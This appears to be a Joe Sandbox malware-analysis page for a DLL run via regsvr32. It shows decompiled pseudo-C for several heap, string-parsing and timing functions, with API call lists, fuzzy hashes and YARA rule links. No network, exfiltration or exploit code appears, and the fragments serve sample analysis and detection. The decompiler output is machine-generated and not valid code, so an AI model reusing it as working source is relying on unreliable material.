Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
String ID:
API String ID: 2523292596-0
Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007DBC Relevance: 6.2, APIs: 4, Instructions: 163
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00000001180007DBC(void* __ebx, void* __ecx, void* __edx, void* __ebp, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
				intOrPtr _v80;
				void* _v88;
				void* _v96;
				signed int _v104;
				long long _v112;
				long long _v120;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t55;
				signed int _t63;
				void* _t64;
				void* _t73;
				signed int _t74;
				void* _t75;
				void* _t86;
				void* _t104;
				signed long long _t109;
				struct _FILETIME* _t112;
				void* _t130;
				void* _t131;
				long long _t133;
				signed int _t134;
				void* _t137;
				void* _t139;
				void* _t149;
				void* _t150;
				long _t151;
				signed int* _t152;
				long long _t153;
				void* _t155;
				signed long long _t157;
				void* _t159;

				_t150 = _t139;
				 *((long long*)(_t150 + 0x18)) = __r8;
				 *((long long*)(_t150 + 0x10)) = __rdx;
				 *(_t150 + 0x20) =  *(_t150 + 0x20) & 0x00000000;
				r14d = 0;
				_v104 =  *0x8000d498;
				_t131 = __rcx;
				 *(_t150 - 0x58) =  *(_t150 - 0x58) & _t157;
				if (E00000001180001CB0(__edx, __ebp, _t112, __rcx, _t150 - 0x60, _t137, _t150 + 8, _t159, _t157) == 0) goto 0x80007e19;
				_t11 = _t157 + 1; // 0x1
				r12d = _t11;
				_v96 = _t133;
				goto 0x80007e24;
				_t134 = _v96;
				r12d = 2;
				_t14 =  &_a32; // 0xba
				_t15 =  &_v88; // 0x42
				if (E00000001180008034(r12d, __ebp, _t112, _t131, _t134, _t15, _t14) != 0) goto 0x80007fff;
				r8d = _a32;
				r13d = r8d;
				r13d = r13d - r12d;
				_t152 = _v88;
				if (_t134 == 0) goto 0x80007e7d;
				_t55 = _a8;
				_t152[0xa] = 1;
				_t152[0x12] = _t134;
				_t152[0xd] = _t55;
				_t152[0x10] = _t55;
				_t24 = _t131 + 0xb0; // 0xb0
				r9d = 0;
				 *_t152 = _v104 ^ 0x62ade362;
				_t152[3] =  *(_t131 + 0x48);
				_t152[2] =  *(_t131 + 0x4c);
				_t29 =  &_a8; // 0xa2
				_v112 = _t29;
				_t31 =  &_v104; // 0x32
				_v120 = _t31;
				_t73 = E0000000118000970C(_t54, __ecx, __ebp, _t86, _t104, _t112, _t24, _t152, _t134, _t15, _t14, _t150);
				HeapFree(_t155, _t151, _t130);
				if (r13d == 0) goto 0x80007eef;
				if (_t73 == 0) goto 0x80007ee4;
				if (_t73 != 0x10d2) goto 0x80007eef;
				E000000011800023B8(_t112, _t131, _t152, _t134, _t137, _t133, _t137);
				if (_t73 != 0) goto 0x80007fff;
				_t74 = _a8;
				_t153 = _v104;
				r13d =  *(_t131 + 0x4c);
				_t63 = E00000001180008C48(_t74, _t31, _t153);
				_t36 =  &_a8; // 0xa2
				r9d = 1;
				 *(_t131 + 0x48) = _t74;
				 *(_t131 + 0x4c) = _t63;
				_t64 = E000000011800099F4(_t74, __ecx, _t74, __ebp, _t112, _t131, _t153, _t134, _t137, _t36, _t149, _t150);
				_t75 = _t64;
				if (_t64 != 0) goto 0x80007fef;
				 *_a16 = _t153;
				 *_a24 = _a8;
				if ( *(_t131 + 0x4c) != r13d) goto 0x80007f62;
				r14d = 1;
				if ( *((intOrPtr*)(_t131 + 0x60)) == 0) goto 0x80007fb5;
				GetSystemTimeAsFileTime(_t112);
				if (r14d == 0) goto 0x80007fa2;
				_t109 =  *((intOrPtr*)(_t131 + 0x58));
				if (_v80 - _t109 <= 0) goto 0x80007fa2;
				_t47 = _t131 + 0xb0; // 0xb0
				if (E000000011800045E8(_t75, __ecx, _t112, _t47, _t134, _t137) != 0) goto 0x80007fa2;
				asm("lock or dword [edi+0xdc], 0x1");
				 *((long long*)(_t131 + 0x58)) = _t109 * 0x23c34600 + _v80;
				if (_v96 == 0) goto 0x80007fdc;
				HeapFree(??, ??, ??);
				if (_t75 == 0) goto 0x80007fd4;
				if (_t75 != 0x10d2) goto 0x80007fdc;
				E00000001180008BC4(_t112, _t131, _v96);
				return _t75;
			}

APIs

Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77

HeapFree.KERNEL32 ref: 0000000180007ECD
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
HeapFree.KERNEL32 ref: 0000000180007FC2
HeapFree.KERNEL32 ref: 0000000180007FF7

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
String ID:
API String ID: 2852518528-0
Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005578 Relevance: 6.0, APIs: 4, Instructions: 37sleepmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055AF
Sleep.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055C1
CloseHandle.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055D9
HeapFree.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055E7

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CloseEventFreeHandleHeapSleep
String ID:
API String ID: 1881548302-0
Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000137C Relevance: 5.2, APIs: 4, Instructions: 233
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0000000118000137C(void* __ecx, void* __edx, void* __edi, signed int __esi, void* __ebp, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
				void* __rbp;
				intOrPtr _t29;
				void* _t32;
				void* _t38;
				void* _t55;
				void* _t56;
				intOrPtr _t57;
				void* _t62;
				void* _t63;
				void* _t67;
				signed int _t76;
				void* _t109;
				void* _t117;
				intOrPtr _t130;
				long long _t134;
				char* _t137;
				intOrPtr* _t144;
				long _t147;
				long _t149;
				void* _t152;
				void* _t154;
				void* _t155;
				intOrPtr* _t159;
				char* _t166;
				void* _t168;
				void* _t175;
				long _t177;
				int _t180;
				void* _t184;
				void* _t186;

				_t168 = __r10;
				_t144 = __rdx;
				_t134 = __rcx;
				 *((long long*)(_t154 + 0x10)) = __rbx;
				 *((long long*)(_t154 + 8)) = __rcx;
				_t155 = _t154 - 0x60;
				_t130 =  *0x8000d4a0;
				r14d = r8d;
				if (r8d == 0) goto 0x8000160a;
				_t76 = __esi | 0xffffffff;
				r11d = 0;
				r10d = 0;
				_t29 =  *__rdx;
				if (_t29 == 0xd) goto 0x80001419;
				if (_t29 == 0xa) goto 0x80001419;
				if (0 != 0) goto 0x800013ef;
				if (_t29 == 0x20) goto 0x800013f1;
				if (_t29 == 9) goto 0x800013f1;
				goto 0x800013f1;
				if (_t29 != 0x3b) goto 0x800013fd;
				if (r11d != 0) goto 0x8000141d;
				r11d = 1;
				if (_t29 != 0x3d) goto 0x80001407;
				if (0 != 0) goto 0x8000141d;
				if (_t29 != 0x7c) goto 0x8000141d;
				if (r10d != 0) goto 0x8000141d;
				if (1 != 0) goto 0x8000141d;
				r10d = 1;
				goto 0x8000141d;
				if (1 != 0) goto 0x80001424;
				if (1 != 0) goto 0x800013ce;
				if (__rdx == _t147) goto 0x8000160a;
				r13d = r13d - r8d;
				r13d = r13d - 1;
				r14d = r14d + r13d;
				r13d = 1;
				if (r11d == 1) goto 0x800015fb;
				if (1 == 0) goto 0x80001459;
				r12d = 1;
				_t5 = _t144 - 1; // -1
				_t55 = _t5;
				goto 0x8000145c;
				_t177 = _t147;
				if (_t55 == 0) goto 0x80001605;
				if (r10d == 0) goto 0x800014db;
				_t6 = _t168 - 1; // -1
				_t62 = _t6;
				if (_t62 == 0) goto 0x800014db;
				_t31 =  <  ? _t62 : 0x10;
				if (0x10 == 0) goto 0x800014ab;
				r9b =  *__rdx;
				if (r9b == dil) goto 0x800014ab;
				if (r9b == 0x20) goto 0x800014ab;
				_t109 = r9b - 9;
				if (_t109 == 0) goto 0x800014ab;
				 *((intOrPtr*)(_t155 + 0x30 - __rdx + __rdx)) = r9b;
				if (_t109 != 0) goto 0x8000148c;
				_t63 = _t62 + 1;
				_t32 = ( <  ? _t62 : 0x10) - 0x10 + _t76;
				 *((intOrPtr*)(_t155 + _t130 + 0x30)) = dil;
				_t166 = _t63 + __rdx;
				if ( *_t166 == 0x20) goto 0x800014c6;
				if ( *_t166 != 9) goto 0x800014cd;
				goto 0x800014ba;
				r9b =  *((intOrPtr*)(_t155 + 0x30));
				_t159 = __rdx + _t130;
				_t56 = _t55 - _t63 + 1;
				goto 0x800014e3;
				r9b = dil;
				 *((intOrPtr*)(_t155 + 0x30)) = dil;
				_t66 =  <  ? _t56 : 0x10;
				r11d = 0x10;
				if (0x10 == 0) goto 0x80001524;
				_t57 =  *_t159;
				if (_t57 == dil) goto 0x80001524;
				if (_t57 == 0x20) goto 0x80001524;
				if (_t57 == 9) goto 0x80001524;
				_t14 = _t134 - 0x61; // -96
				_t117 = _t14 - 0x19;
				if (_t117 > 0) goto 0x80001518;
				 *((char*)(_t155 + 0x48 - _t159 + _t159)) = _t57 + 0xe0;
				r11d = r11d + _t76;
				if (_t117 != 0) goto 0x800014fc;
				_t67 = ( <  ? _t56 : 0x10) - r11d;
				 *((intOrPtr*)(_t155 + __rdx + 0x48)) = dil;
				if (r9b != dil) goto 0x80001546;
				r8d = 0x10;
				memcpy(_t186, _t184, _t180);
				if (_t177 == _t147) goto 0x80001591;
				if (1 <= 0) goto 0x80001568;
				if ( *_t177 == 0x20) goto 0x8000155f;
				if ( *_t177 != 9) goto 0x80001568;
				if (1 - 1 < 0) goto 0x80001551;
				if (1 == 1) goto 0x80001593;
				_t38 = _t152 - 1;
				if (_t38 <= 0) goto 0x8000158c;
				_t137 = _t38 + _t177 + 1;
				if ( *_t137 == 0x20) goto 0x80001583;
				if ( *_t137 != 9) goto 0x8000158c;
				if (_t38 + _t76 > 0) goto 0x80001579;
				goto 0x80001593;
				_t22 = _t152 + 1; // 0x1
				r8d = _t22;
				HeapAlloc(_t175, _t147, _t149);
				if (_t130 == _t147) goto 0x800015f8;
				r8d = 0;
				memcpy(_t152, ??);
				 *((intOrPtr*)(__rbx + _t130)) = dil;
				E00000001180008C48(0xffffffff, _t130, _t155 + 0x48);
				r9d = 0;
				 *((long long*)(_t155 + 0x20)) = _t155 + 0x30;
				E00000001180005748(0, _t57 + 0xe0, 0, __rbx,  *((intOrPtr*)(_t155 + 0xa0)), _t177 + 1, _t130);
				HeapFree(??, ??, ??);
				if (r14d == 0) goto 0x8000160a;
				goto 0x800013bb;
				return 0xb;
			}

APIs

memcpy.NTDLL ref: 0000000180001541
HeapAlloc.KERNEL32 ref: 000000018000159C
memcpy.NTDLL ref: 00000001800015B5
HeapFree.KERNEL32 ref: 00000001800015F2

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heapmemcpy$AllocFree
String ID:
API String ID: 1496448200-0
Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001208 Relevance: 5.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00000001180001208(void* __edi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
				char _v48;
				long long _v56;
				void* _t22;
				void* _t24;
				long long _t45;
				long long _t59;
				long long _t60;
				void* _t70;
				long long* _t75;
				void* _t77;

				_t58 = __rdx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t45 =  *0x8000d4a0;
				r12d = r8d;
				_t77 = __rdx;
				if (__rdx == _t59) goto 0x80001304;
				if (r8d == 0) goto 0x80001304;
				EnterCriticalSection(??);
				asm("lock add dword [esi+0x40], 0x1");
				LeaveCriticalSection(??);
				_t7 =  &_a8; // -110
				r8d = 0;
				_v48 = 0;
				_a8 = 0;
				_v56 = _t59;
				if (E00000001180009994(_t22, r12d, __rbx, __rdx, __rdx, _t70, _t7) != 0x7a) goto 0x800012fd;
				r8d = _a8;
				_t24 = HeapAlloc(??, ??, ??);
				_t60 = _t45;
				if (_t45 == 0) goto 0x800012f8;
				_v48 = 0x10;
				_t14 =  &_a8; // -110
				_t75 = _t14;
				_v56 = __rcx + 0x72;
				if (E00000001180009994(_t24, r12d, __rbx, _t77, _t58, _t45, _t75) != 0) goto 0x800012e8;
				 *__r9 = _t60;
				 *_a40 = _a8;
				goto 0x800012fd;
				HeapFree(??, ??, ??);
				goto 0x800012fd;
				asm("lock add dword [esi+0x40], 0xffffffff");
				goto 0x80001313;
				 *_t75 = _t60;
				 *_a40 = 0;
				return 0;
			}

APIs

EnterCriticalSection.KERNEL32(?,000000018000134F), ref: 0000000180001256
LeaveCriticalSection.KERNEL32 ref: 0000000180001265
HeapAlloc.KERNEL32 ref: 000000018000129C
HeapFree.KERNEL32 ref: 00000001800012F0

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeave
String ID:
API String ID: 2939682908-0
Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800081F0 Relevance: 5.1, APIs: 4, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E000000011800081F0(void* __ebx, void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
				signed int _t22;
				signed int _t29;
				signed int* _t39;
				int _t54;
				long long _t59;
				void* _t62;
				void* _t73;
				signed int* _t74;
				long _t76;
				long _t79;
				void* _t82;

				 *((long long*)(_t62 + 8)) = __rbx;
				 *((long long*)(_t62 + 0x10)) = _t59;
				 *((long long*)(_t62 + 0x18)) = __rsi;
				_t22 =  *__rcx & 0x0000ffff;
				_t39 = __rbx + 4;
				r11d = __edx;
				r10d = 0x57;
				if (__r11 - _t39 <= 0) goto 0x800082e1;
				_t29 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
				if (_t22 == 0) goto 0x800082e1;
				if (_t22 - 0x200 > 0) goto 0x800082e1;
				if (_t29 == 0) goto 0x800082e1;
				if (_t29 - 0x200 > 0) goto 0x800082e1;
				r15d = 0x404;
				HeapAlloc(_t82, _t79, _t76);
				_t74 = _t39;
				if (_t39 == 0) goto 0x800082db;
				memset(_t73, _t54);
				 *_t74 = (_t22 & 0x0000fff0) << 3;
				memcpy(??, ??, ??);
				memcpy(??, ??, ??);
				 *__r8 = _t74;
				 *__r9 = r15d;
				r10d = 0;
				goto 0x800082e1;
				r10d = 8;
				return r10d;
			}

APIs

HeapAlloc.KERNEL32 ref: 0000000180008278
memset.NTDLL ref: 000000018000828E
memcpy.NTDLL ref: 00000001800082B4
memcpy.NTDLL ref: 00000001800082CA

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: memcpy$AllocHeapmemset
String ID:
API String ID: 609429373-0
Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800030C8 Relevance: 5.1, APIs: 4, Instructions: 77memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,0000000180008793), ref: 000000018000310D
HeapAlloc.KERNEL32(?,?,?,0000000180008793), ref: 0000000180003126
memcpy.NTDLL ref: 000000018000314B
memcpy.NTDLL ref: 000000018000317D

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: memcpy$AllocHeaplstrlen
String ID:
API String ID: 2888080719-0
Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008C60 Relevance: 5.1, APIs: 4, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1

Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476

HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
String ID:
API String ID: 2387776105-0
Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006008 Relevance: 5.1, APIs: 4, Instructions: 68memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000,0000000180006189), ref: 0000000180006042
HeapAlloc.KERNEL32 ref: 0000000180006057
_snprintf.NTDLL ref: 00000001800060B9
lstrcpyA.KERNEL32 ref: 00000001800060DD

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: AllocHeap_snprintflstrcpylstrlen
String ID:
API String ID: 2416262065-0
Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003E58 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000180003EE6
HeapFree.KERNEL32 ref: 0000000180003EFA
HeapFree.KERNEL32 ref: 0000000180003F0E
HeapFree.KERNEL32 ref: 0000000180003F22

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: FreeHeap$ErrorLast
String ID:
API String ID: 2332451156-0
Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005BDC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00000000,00000000,0000000180001A27), ref: 0000000180005C15
memcpy.NTDLL ref: 0000000180005C31
EnterCriticalSection.KERNEL32 ref: 0000000180005C45
LeaveCriticalSection.KERNEL32 ref: 0000000180005C72

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$AllocEnterHeapLeavememcpy
String ID:
API String ID: 224082080-0
Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001C00 Relevance: 5.0, APIs: 4, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00000001800022FC), ref: 0000000180001C29
HeapAlloc.KERNEL32(?,?,?,00000001800022FC), ref: 0000000180001C3F
memcpy.NTDLL(?,?,?,00000001800022FC), ref: 0000000180001C56
memset.NTDLL(?,?,?,00000001800022FC), ref: 0000000180001C68

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

